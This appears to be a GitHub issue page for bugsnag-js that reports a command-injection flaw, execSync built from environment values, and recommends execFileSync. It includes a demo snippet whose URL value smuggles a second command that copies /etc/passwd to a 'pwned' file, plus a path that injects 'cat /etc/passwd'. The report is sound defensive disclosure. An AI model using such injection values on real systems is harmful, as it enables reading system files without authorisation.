bugsnag-js
bugsnag-js copied to clipboard
bugsnag
fix Shell command built from environment values
https://github.com/bugsnag/bugsnag-js/blob/0c272be56233026c8c0ba6f039359408c1b1789d/scripts/generate-react-native-fixture.js#L137-L137
fix the issue dynamically constructed shell command should be replaced with a safer alternative that avoids interpretation by the shell. Specifically, the execSync call should be replaced with execFileSync, which allows passing arguments as an array, ensuring that special characters in paths are properly escaped and do not alter the command's behavior.
- Replace the
execSynccall on line 137 withexecFileSync. - Pass the
npmcommand and its arguments as separate parameters toexecFileSync. - Ensure that
scenarioLauncherPackageandfixtureDirare passed as arguments, not interpolated into a string.
Dynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.
The following shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.
var cp = require("child_process"),
path = require("path");
function cleanupTemp() {
let cmd = "rm -rf " + path.join(__dirname, "temp");
cp.execSync(cmd); // BAD
}
const cp = require("child_process");
const path = require("path");
// Simulasi dari nilai dtsUri yang datang dari sumber tidak tepercaya (misalnya environment variable, input user, dsb)
const maliciousUrl = "http://<redacted-ip>/file --output /tmp/fake.js; cat /etc/passwd > /tmp/pwned.txt #";
const outPath = "/tmp/output.d.ts";
function vulnerableDownload() {
// ⚠️ VULNERABLE: Shell command constructed as a single string
const cmd = `curl -o ${outPath} ${maliciousUrl}`;
console.log("[*] Executing:", cmd);
cp.execSync(cmd); // Exploitable
}
vulnerableDownload();
The shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path. For instance, if the absolute path of the temporary directory is /home/bugsnag-js/important project/temp, then the shell command will recursively delete /home/bugsnag-js/important and project/temp, where the latter path gets resolved relative to the working directory of the JavaScript process.
Even worse, although less likely, a malicious user could provide the path /home/bugsnag-js/; cat /etc/passwd #/important project/temp in order to execute the command cat /etc/passwd. To avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:
var cp = require("child_process"),
path = require("path");
function cleanupTemp() {
let cmd = "rm",
args = ["-rf", path.join(__dirname, "temp")];
cp.execFileSync(cmd, args); // GOOD
}
References
Command Injection CWE-78 CWE-88
